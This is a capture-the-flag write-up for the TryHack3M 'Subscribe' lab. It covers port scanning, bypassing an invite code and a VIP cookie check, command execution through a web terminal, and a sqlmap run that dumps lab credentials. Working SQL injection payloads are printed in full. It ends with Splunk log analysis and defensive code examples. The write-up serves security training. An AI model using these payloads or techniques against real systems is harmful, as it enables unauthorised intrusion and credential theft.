TryHack3M: Subscribe


Target IP: 10.10.219.164
Challenge Description:


Offense: Exploitation

Performing a SYN scan of all ports with the command sudo nmap -sS 10.10.219.164 -p- returns the result shown above. There are six open TCP ports on the target machine. I will need to perform an aggressive scan against these ports to identify more information.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sudo nmap -sV -A 10.10.219.164 -p 22,80,8000,8089,8191,40009
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-26 18:03 UTC
Nmap scan report for 10.10.219.164
Host is up (0.023s latency).

PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5f:1c:57:45:b9:9d:c8:69:e9:47:94:21:a3:fd:eb:70 (RSA)
|   256 a2:2e:5b:e0:e1:41:54:ef:9f:a7:99:17:2b:3d:e2:0e (ECDSA)
|_  256 c6:d2:62:0a:51:70:8d:98:9c:12:e0:95:32:55:87:25 (ED25519)
80/tcp    open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack3M | Cyber Security Training
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
8000/tcp  open  http            Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.219.164:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp  open  ssl/http        Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2024-04-05T11:00:59
|_Not valid after:  2027-04-05T11:00:59
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
8191/tcp  open  limnerpressure?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
40009/tcp open  http            Apache httpd 2.4.41
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.41 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.94%I=7%D=4/26%Time=662BEC7E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   21.98 ms 10.14.0.1
2   22.19 ms 10.10.219.164

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.04 seconds

I performed an aggressive port scan using the command sudo nmap -sV -A 10.10.219.164 -p 22,80,8000,8089,8191,40009 against the six open TCP ports and got the result shown above. Port 22 runs SSH, and the rest are HTTP services running different applications. I will start enumeration with the HTTP applications, beginning with port 80.


Enumeration

Port 80: HTTP
The webpage above is displayed when I visit the web application in my browser. Right away, I notice Login and Join NOW options. Maybe I can register as a user? The Login option displays the login page; the register page, however, is more interesting.

The sign-up page is shown above. It says I cannot register an account unless I have an invite code. Maybe the source code of this page contains useful information? Time to find out.

Scanning through the source code of the sign-up page, I identified an interesting file named invite.js, as shown above. Maybe this file contains some useful information?

The source code of invite.js is shown above.

function e() {
    var e = window.location.hostname;
    if (e === "capture3millionsubscribers.thm") {
        var o = new XMLHttpRequest;
        o.open("POST", "inviteCode1337HM.php", true);
        o.onload = function() {
            if (this.status == 200) {
                console.log("Invite Code:", this.responseText)
            } else {
                console.error("Error fetching invite code.")
            }
        };
        o.send()
    } else if (e === "hackme.thm") {
        console.log("This function does not operate on hackme.thm")
    } else {
        console.log("Lol!! Are you smart enought to get the invite code?")
    }
}

The formatted source code of invite.js is shown above. The code is easy to understand: if the hostname is capture3millionsubscribers.thm, a POST request is made to inviteCode1337HM.php and the invite code is printed to the browser console. Time to put this to the test. To do so, I will need to add the hostname capture3millionsubscribers.thm to my /etc/hosts file and then call the function e to obtain the code.

I added the hostname to my /etc/hosts file first. Then I browsed to the web application again.

I browsed to http://capture3millionsubscribers.thm/sign_up.php and executed the function e by calling it from the browser's web console. After executing it, I obtained the invite code VkXgo:Invited30MnUsers, as shown above. Maybe I can register as a user now.

After entering the invite code, the webpage above is shown to me. I am provided with the credentials guest@hackme.thm:wedidit1010. Now I can log in as this new user.

I logged in with the new set of credentials and was presented with the webpage above. It looks like some sort of dashboard with two training rooms, as shown above. I viewed the source code of the training rooms and of the dashboard page, but I did not find anything useful.

However, when I intercepted a request to dashboard.php, I identified a parameter named isVIP. It is set in the cookie of the request. Maybe I can set it to true?

I then changed the value of the parameter to true, as shown above.
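The isVIP cookie is a client-controlled value, so anything that reads it back as an authorization decision can be flipped in an intercepting proxy exactly as done above. As an added example (not the challenge's code; it assumes a server-side session store keyed by PHPSESSID and a cookie named isVIP, both my assumptions), here is the vulnerable pattern next to two server-side fixes:

```python
"""Added example, not code from the challenge: why an authorization flag such as
isVIP must not be read back from the cookie, and two server-side alternatives.
Assumptions (mine): the app has a server-side session store keyed by PHPSESSID,
and a cookie named isVIP carrying "true"/"false"."""
import hashlib
import hmac
import secrets


# --- Vulnerable pattern: the decision is whatever the client sent.
def is_vip_vulnerable(cookies: dict) -> bool:
    """Editing the cookie to isVIP=true in an intercepting proxy is enough."""
    return cookies.get("isVIP", "false").lower() == "true"


# --- Fix 1: keep the role server-side; the cookie only identifies the session.
SESSION_STORE = {  # constructed sample sessions, keyed by PHPSESSID value
    "sess-guest-0001": {"user": "guest@hackme.thm", "vip": False},
    "sess-admin-0002": {"user": "admin@hackme.thm", "vip": True},
}


def is_vip_server_side(cookies: dict, store: dict = SESSION_STORE) -> bool:
    """Ignore any isVIP cookie entirely; look the role up by session id."""
    session = store.get(cookies.get("PHPSESSID", ""))
    return bool(session and session["vip"])


# --- Fix 2: if a claim has to travel in the cookie, sign it with a server key
#     so a modified value is rejected. The key is generated here for the demo;
#     a real deployment loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def sign_claim(claim: str, key: bytes = SERVER_KEY) -> str:
    """Return '<claim>.<hex HMAC-SHA256 over claim>' for use as a cookie value."""
    tag = hmac.new(key, claim.encode(), hashlib.sha256).hexdigest()
    return f"{claim}.{tag}"


def read_signed_claim(cookie_value: str, key: bytes = SERVER_KEY):
    """Return the claim if its tag verifies, else None (missing, forged, tampered)."""
    claim, sep, tag = cookie_value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, claim.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return claim


def is_vip_signed(cookies: dict, key: bytes = SERVER_KEY) -> bool:
    """VIP only if the cookie carries a claim of "true" with a valid tag."""
    return read_signed_claim(cookies.get("isVIP", ""), key) == "true"


if __name__ == "__main__":
    forged = {"isVIP": "true", "PHPSESSID": "sess-guest-0001"}
    print("vulnerable :", is_vip_vulnerable(forged))       # True
    print("server-side:", is_vip_server_side(forged))      # False
    print("signed     :", is_vip_signed(forged))           # False
    print("signed ok  :", is_vip_signed({"isVIP": sign_claim("true")}))  # True
```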

However, I again did not find anything useful in the new training room. I tried to start the machine, but had no luck either: the message This page is only for VIP users was shown to me even after changing the isVIP parameter to true. When viewing the source code of this training room, I noticed the unusual piece of code shown above. I am guessing it is responsible for redirecting the request to another page. Maybe I can search for other .php files to identify where it redirects to? Time to test it.

And bingo! I found another PHP page hidden in the source code. To identify it, I searched the page's source code for the string .php. The name BBF813FA941496FCE961EBA46D754FF3.php is interesting.

Voila! Now I have access to the VIP training room, as shown above. This web application looks like a terminal. Maybe I can run commands with it?

Using the web application, I executed the command whoami and obtained the result www-data, as shown above.

I executed the command ls and noticed an interesting file named config.php. Then I executed the command cat config.php and obtained the result shown above. The secure token is ACC#SS_TO_ADM1N_P@NEL. According to the configuration file, the admin panel seems to be located at http://admin1337special.hackme.thm:40009. I will need to add the hostname admin1337special.hackme.thm to my /etc/hosts file.

I added the hostname to my /etc/hosts file. Then I browsed to http://admin1337special.hackme.thm:40009, but the webpage above was shown to me: I do not have access to it. Time to perform a directory search to identify any pages I can access.

I used the command gobuster dir -u http://admin1337special.hackme.thm:40009/public/html/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt to identify hidden files and directories and got the multiple hits shown above. The entry login.php seems interesting.

Browsing to http://admin1337special.hackme.thm:40009/public/html/login.php shows the webpage above. This seems to be the administration portal. Maybe I can access it using the token ACC#SS_TO_ADM1N_P@NEL.

After using the login token, I am prompted to log in, but I do not have the credentials. Hmmm. I tried default credentials such as admin:admin, but had no luck. I checked the inputs for SQL injection, but had no luck either. I intercepted the login attempt with Burp Suite and saved it to a file called req on my machine.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sqlmap -r req --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:35:38 /2024-04-26/

[19:35:38] [INFO] parsing HTTP request from 'req'
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[19:35:40] [INFO] testing connection to the target URL
[19:35:40] [INFO] testing if the target URL content is stable
[19:35:41] [INFO] target URL content is stable
[19:35:41] [INFO] testing if (custom) POST parameter 'JSON username' is dynamic
[19:35:41] [WARNING] (custom) POST parameter 'JSON username' does not appear to be dynamic
[19:35:41] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON username' might be injectable (possible DBMS: 'MySQL')
[19:35:41] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON username' might be vulnerable to cross-site scripting (XSS) attacks
[19:35:41] [INFO] testing for SQL injection on (custom) POST parameter 'JSON username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 1
[19:35:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:35:46] [WARNING] reflective value(s) found and filtering out
[19:35:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:35:47] [INFO] testing 'Generic inline queries'
[19:35:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:35:47] [INFO] (custom) POST parameter 'JSON username' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[19:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:35:47] [WARNING] time-based comparison requires larger statistical model, please wait.......... (done)                                                                           
[19:35:57] [INFO] (custom) POST parameter 'JSON username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:35:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:35:57] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:35:57] [INFO] target URL appears to have 7 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:36:32] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[19:36:33] [INFO] target URL appears to be UNION injectable with 7 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:37:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:37:34] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
(custom) POST parameter 'JSON username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 168 HTTP(s) requests:
---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"username":"admin' AND EXTRACTVALUE(4821,CONCAT(0x5c,0x716a716a71,(SELECT (ELT(4821=4821,1))),0x7162707a71)) AND 'PXhx'='PXhx","password":"admin"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"admin' AND (SELECT 1155 FROM (SELECT(SLEEP(5)))OQhp) AND 'Hyaq'='Hyaq","password":"admin"}
---
[19:37:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
[19:37:42] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:37:42] [INFO] fetching current database
[19:37:42] [INFO] retrieved: 'hackme'
[19:37:42] [INFO] fetching tables for database: 'hackme'
[19:37:42] [INFO] retrieved: 'config'
[19:37:42] [INFO] retrieved: 'users'
[19:37:42] [INFO] fetching columns for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'id'
[19:37:42] [INFO] retrieved: 'int'
[19:37:42] [INFO] retrieved: 'title'
[19:37:42] [INFO] retrieved: 'varchar(255)'
[19:37:42] [INFO] retrieved: 'value'
[19:37:42] [INFO] retrieved: 'text'
[19:37:42] [INFO] fetching entries for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'invite'
[19:37:42] [INFO] retrieved: '1'
[19:37:42] [INFO] retrieved: 'signup'
Database: hackme
Table: config
[1 entry]
+----+--------+---------+
| id | title  | value   |
+----+--------+---------+
| 1  | signup | invite  |
+----+--------+---------+

[19:37:42] [INFO] table 'hackme.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/config.csv'
[19:37:42] [INFO] fetching columns for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'email'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'id'
[19:37:43] [INFO] retrieved: 'int'
[19:37:43] [INFO] retrieved: 'name'
[19:37:43] [INFO] retrieved: 'varchar(300)'
[19:37:43] [INFO] retrieved: 'password'
[19:37:43] [INFO] retrieved: 'varchar(255)'
[19:37:43] [INFO] retrieved: 'role'
[19:37:43] [INFO] retrieved: 'varchar(20)'
[19:37:43] [INFO] retrieved: 'status'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'username'
[19:37:43] [INFO] retrieved: 'varchar(50)'
[19:37:43] [INFO] fetching entries for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'admin@hackme.thm'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'Admin User'
[19:37:43] [INFO] retrieved: 'adminisadm1n'
[19:37:43] [INFO] retrieved: 'admin'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'admin'
Database: hackme
Table: users
[1 entry]
+----+------------+-------+------------------+--------+--------------+----------+
| id | name       | role  | email            | status | password     | username |
+----+------------+-------+------------------+--------+--------------+----------+
| 1  | Admin User | admin | admin@hackme.thm | 1      | adminisadm1n | admin    |
+----+------------+-------+------------------+--------+--------------+----------+

[19:37:43] [INFO] table 'hackme.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/users.csv'
[19:37:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm'
[19:37:43] [WARNING] your sqlmap version is outdated

[*] ending @ 19:37:43 /2024-04-26/

After running sqlmap on the saved request req, I obtained the result above. I now have the password of the user admin: the new credential set is admin:adminisadm1n, as shown above. Time to test it :)
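The sqlmap output above reports the JSON username field as error-based injectable. As an added example (not the portal's code), the query shape that produces that result sits next to the parameterized form that does not; it assumes a handler that reads the JSON body and runs one SELECT against a users table shaped like the one sqlmap dumped, and uses SQLite in place of MySQL:

```python
"""Added example, not the portal's code: the query shape that makes the JSON
'username' field injectable, beside the parameterized version that is not.
Assumptions (mine): the login handler reads {"username": ..., "password": ...}
from the POST body and runs one SELECT against a users table shaped like the one
sqlmap dumped. SQLite stands in for MySQL, so it lacks EXTRACTVALUE and the error
text differs, but the failure mode is the same: attacker-controlled SQL reaches
the database and its error (or result) comes back in the response."""
import json
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with the columns sqlmap enumerated."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT, email TEXT,"
               " status INTEGER, password TEXT, username TEXT)")
    # The password column holds a placeholder here; a real app stores a hash.
    db.execute("INSERT INTO users VALUES (1, 'Admin User', 'admin',"
               " 'admin@hackme.thm', 1, 'placeholder-secret', 'admin')")
    return db


def login_vulnerable(db: sqlite3.Connection, body: str):
    """String-built query: the JSON values are spliced into the SQL verbatim."""
    creds = json.loads(body)
    sql = ("SELECT id, role FROM users WHERE username = '%s' AND password = '%s'"
           % (creds["username"], creds["password"]))
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing this into the HTTP response is what the error-based technique
        # needs: sqlmap's EXTRACTVALUE payload makes MySQL raise an error whose
        # message embeds a query result ("reflective value(s) found" above).
        return f"DB ERROR: {exc}"


def login_parameterized(db: sqlite3.Connection, body: str):
    """Bound parameters: the same payload is compared as a literal username."""
    creds = json.loads(body)
    sql = "SELECT id, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (creds["username"], creds["password"])).fetchone()


# The error-based payload sqlmap reported for this target (from the write-up).
ERROR_PAYLOAD = (
    '{"username":"admin\' AND EXTRACTVALUE(4821,CONCAT(0x5c,0x716a716a71,'
    '(SELECT (ELT(4821=4821,1))),0x7162707a71)) AND \'PXhx\'=\'PXhx",'
    '"password":"admin"}'
)
# A normal login using the constructed placeholder secret.
GOOD_LOGIN = '{"username":"admin","password":"placeholder-secret"}'


if __name__ == "__main__":
    db = make_db()
    print("normal login, vulnerable    :", login_vulnerable(db, GOOD_LOGIN))
    print("normal login, parameterized :", login_parameterized(db, GOOD_LOGIN))
    print("sqlmap payload, vulnerable  :", login_vulnerable(db, ERROR_PAYLOAD))
    print("sqlmap payload, parameterized:", login_parameterized(db, ERROR_PAYLOAD))
```

With the string-built query the payload reaches the database and the error text comes back to the caller; with bound parameters the whole payload is just an unknown username and the lookup returns nothing.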

Now I have access to the administration portal, as shown above. I changed the registration method to Sign Up and pressed Set Options. After doing this, I should be able to access the flag at http://hackme.thm.

And bingo! The flag for the first part of the challenge is shown above. The first part is complete. The second part is the defensive side now :)


Defense: Splunklab

The total number of logs is 10530, as shown above. I used the search index=*.

The web hacking tool the attacker used against the website is sqlmap, as shown above. The total number of events related to the attack is 158.

The observed IP address of the attacker is 83.45.212.17, as shown above. This can be identified by checking any of the sqlmap events.

The total number of events observed from the attacker's IP is 184, as shown above. To find this, I filtered the events by the attacker's IP with the search index=* source_ip="83.45.212.17".

Previously, I identified the sqlmap logs. Checking through them, I noticed the interesting entry shown above. The table name the attacker used in the attack is TryHack3M_Users, as shown above.
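The five Splunk questions above (total events, the tool, the attacker's IP, events from that IP, and the table name in the payload) come down to parsing access logs and grouping on User-Agent, source IP and the decoded query string. As an added example (not part of the write-up), here is that triage in plain Python over constructed Apache combined-format lines; the lines, the IP and the sqlmap default User-Agent are my assumptions, not the lab's data:

```python
"""Added example, not part of the write-up: the Splunk questions answered in
plain Python over access-log lines. Assumptions (mine): the lab's events are
web-server access logs in Apache "combined" format; the lines below are
constructed, not copied from the lab, and use sqlmap's default User-Agent."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format: ip ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample events: two benign clients plus one sqlmap run and one
# browser request from the same source IP.
SAMPLE_LOG = """\
10.14.0.7 - - [26/Apr/2024:19:30:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
83.45.212.17 - - [26/Apr/2024:19:35:40 +0000] "POST /public/html/login.php HTTP/1.1" 200 812 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
83.45.212.17 - - [26/Apr/2024:19:35:41 +0000] "GET /public/html/login.php?username=admin%27%20AND%20%271%27%3D%271 HTTP/1.1" 200 812 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
83.45.212.17 - - [26/Apr/2024:19:36:02 +0000] "GET /public/html/login.php?username=admin%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%20FROM%20TryHack3M_Users--%20- HTTP/1.1" 500 233 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
83.45.212.17 - - [26/Apr/2024:19:40:10 +0000] "GET /dashboard.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
10.14.0.9 - - [26/Apr/2024:19:41:00 +0000] "GET /sign_up.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"
"""

# Table names are visible only after URL-decoding the query string.
TABLE_RE = re.compile(r"\bFROM\s+([A-Za-z_][A-Za-z0-9_]*)", re.IGNORECASE)


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["status"] = int(ev["status"])
            ev["path"] = unquote_plus(ev["path"])   # decode %27, %20, ...
            events.append(ev)
    return events


def sqlmap_events(events: list) -> list:
    """Events whose User-Agent self-identifies as sqlmap (its default UA)."""
    return [e for e in events if "sqlmap" in e["ua"].lower()]


def events_by_ip(events: list) -> Counter:
    return Counter(e["ip"] for e in events)


def referenced_tables(events: list) -> Counter:
    """Table names named after FROM in the decoded request path."""
    tables = Counter()
    for e in events:
        tables.update(TABLE_RE.findall(e["path"]))
    return tables


def triage(text: str) -> dict:
    """Answer the same questions the Splunk searches above answered."""
    events = parse_log(text)
    tool_hits = sqlmap_events(events)
    by_tool_ip = events_by_ip(tool_hits)
    attacker = by_tool_ip.most_common(1)[0][0] if by_tool_ip else None
    return {
        "total_events": len(events),
        "sqlmap_events": len(tool_hits),
        "attacker_ip": attacker,
        "events_from_attacker": events_by_ip(events)[attacker] if attacker else 0,
        "tables_referenced": dict(referenced_tables(tool_hits)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key:>22}: {value}")
```

Note that the count from the attacker's IP (4) is higher than the sqlmap count (3) for the same reason it is in the lab (184 versus 158): the same source also sent requests that did not carry the tool's User-Agent.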